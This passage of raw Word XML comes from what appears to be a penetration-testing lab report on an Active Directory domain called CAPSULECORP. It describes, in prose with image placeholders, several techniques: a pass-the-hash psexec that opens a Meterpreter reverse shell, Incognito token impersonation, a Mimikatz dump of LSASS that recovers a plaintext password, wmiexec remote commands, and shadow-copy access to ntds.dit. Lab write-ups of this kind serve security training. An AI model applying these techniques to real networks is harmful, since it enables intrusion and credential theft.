      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8720EE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc30424"/>
      <w:r>
        <w:t xml:space="preserve">10.1.2 Locating Logged-in Domain Admin Users </w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1406F53F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In figure 20, it is showing active user sessions on the target host (10.0.10.227). The results confirm that both CAPSULECORP\testuser1 and CAPSULECORP\Administrator are actively logged into the system, validating that the newly created domain user successfully established </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">an interactive session. The scan also indicates that host 10.0.10.207 is unreachable over SMB, while execution and cleanup processes completed successfully on the reachable target.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB40DC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11CB9AD1" wp14:editId="4AFF026A">
            <wp:extent cx="5943600" cy="1361440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2640" name="Picture 2640"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2640" name="Picture 2640"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1361440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F422FE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 20: Identifying Logged-In User Using the Metasploit psexec_loggedin_user Module </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEF59C4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="23" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5398D4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc30425"/>
      <w:r>
        <w:t xml:space="preserve">10.2 Obtaining Domain Admin Privileges </w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="451AFB0C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In figure 21, it shows a successful exploitation of the target host (10.0.10.227) using the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371DC2EB" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit windows/smb/psexec module. The attacker authenticates as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB76C2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CAPSULECORP\Administrator using an NTLM hash, uploads a payload, and executes it via </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1797AB99" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a created service. This results in a reverse connection to the attacker machine (10.0.10.199:4444), establishing a Meterpreter session, which confirms remote code execution and full system-level access on the target. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309ECC1F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4289" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="340C8914" wp14:editId="5FF3A5AC">
            <wp:extent cx="3348990" cy="2961894"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2642" name="Picture 2642"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2642" name="Picture 2642"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3348990" cy="2961894"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57099C4C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 21: Opening a Meterpreter Session Using the exploit/windows/smb/psexec Module </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BE040D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE2489" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="145"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc30426"/>
      <w:r>
        <w:t xml:space="preserve">10.2 Obtaining domain admin privileges </w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="4DBC965A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once a system with an active domain admin session is found, the goal is to use that session to gain domain admin access. If administrative access to the system is already available, it is possible to interact with the system directly and take advantage of the active session. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E0DAD4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Two main approaches can be used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B37D295" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impersonating the user through their session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77965041" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="256" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extracting their credentials from memory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91BB4F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Both methods allow you to operate with domain admin privileges. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCB9C8A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="219" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674147FA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc30427"/>
      <w:r>
        <w:t xml:space="preserve">10.2.1 Impersonating Logged-In Users with Incognito </w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="4E732699" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Figure 22, it demonstrates a successful token impersonation on the compromised host. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329CA130" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacker lists available tokens and identifies a delegation token for CAPSULECORP\testuser1. After correcting the domain name syntax, the impersonate_token command is executed successfully, allowing the attacker to assume the identity of the domain user.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE06D9A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4409" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2127966C" wp14:editId="06C26609">
            <wp:extent cx="3276600" cy="3199892"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2706" name="Picture 2706"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2706" name="Picture 2706"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3276600" cy="3199892"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D98B81" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 22: Impersonating a Domain User Token Using the Incognito Extension </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C9B68B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066CD4CE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182CA24E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035B380C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc30428"/>
      <w:r>
        <w:t xml:space="preserve">10.2.2 Harvesting clear-text credentials with Mimikatz </w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="5D81D031" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In figure 23, it confirms valid authentication as capsulecorp.local\administrator using an NTLM hash and proceeds to dump credentials from LSASS memory. The output reveals multiple sensitive artifacts, including Kerberos tickets and both hashed and plaintext credentials for CAPSULECORP\testuser1. Notably, the plaintext password P@ssw0rd123 is recovered, demonstrating insecure credential handling and enabling potential lateral movement and privilege escalation within the domain.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581CCB9B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD10E9B" wp14:editId="712A3802">
            <wp:extent cx="5943600" cy="951230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2777" name="Picture 2777"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2777" name="Picture 2777"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="951230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BBD10C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 23: Harvesting clear-text credentials from memory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374FAE19" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D6CEC6" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="145"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc30429"/>
      <w:r>
        <w:t xml:space="preserve">10.3 ntds.dit and the keys to the kingdom  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="79C745A9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In diagram 5, it shows how password hashes are obtained from the domain controller after gaining domain admin access. First, a domain admin user is impersonated to gain full access to the domain controller. Then, a volume shadow copy is created, which allows access to protected system files. From this shadow copy, important files such as ntds.dit and the system registry are accessed and copied. Finally, these files are used with a tool to extract all password hashes for Active Directory users, giving full access to the network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC86C63" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1349" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BB38D8C" wp14:editId="324A388F">
            <wp:extent cx="5219700" cy="2524125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2779" name="Picture 2779"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2779" name="Picture 2779"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5219700" cy="2524125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF305E1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="206" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagram 5: Controlling the entire Active Directory domain </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09356295" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60139970" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF23713" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the figure 24, command execution on the target host (10.0.10.227) using NetExec (nxc) with administrative credentials. After successful authentication as capsulecorp.local\administrator via NTLM hash, the tool executes a command through wmiexec to ping the domain controller (capsulecorp.local – 10.0.10.200). The successful replies confirm network connectivity and demonstrate the attacker’s ability to execute arbitrary commands remotely, enabling lateral movement and internal network reconnaissance. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6937C87D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="646" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="646893CC" wp14:editId="1AFAEEC0">
            <wp:extent cx="5666994" cy="1313815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2851" name="Picture 2851"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2851" name="Picture 2851"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5666994" cy="1313815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C135587" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 24: Identifying the domain controller using a domain ping </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC4E806" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="58" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1905E8B4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc30430"/>
      <w:r>
        <w:t xml:space="preserve">10.3.1 Bypassing restrictions with VSC </w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="12BCEF8D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t>In figure 25, the tool confirms valid login and executes the command vssadmin list shadows via wmiexec. The output shows that no volume shadow copies are present on the system, indicating that there are no existing backups available for credential extraction from shadow copies. This demonstrates successful lateral movement using harvested credentials, even though no shadow data was retrieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753EA380" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1560" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27A5F5F9" wp14:editId="24DA0A1B">
            <wp:extent cx="5079492" cy="675640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2853" name="Picture 2853"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2853" name="Picture 2853"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5079492" cy="675640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1356F0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
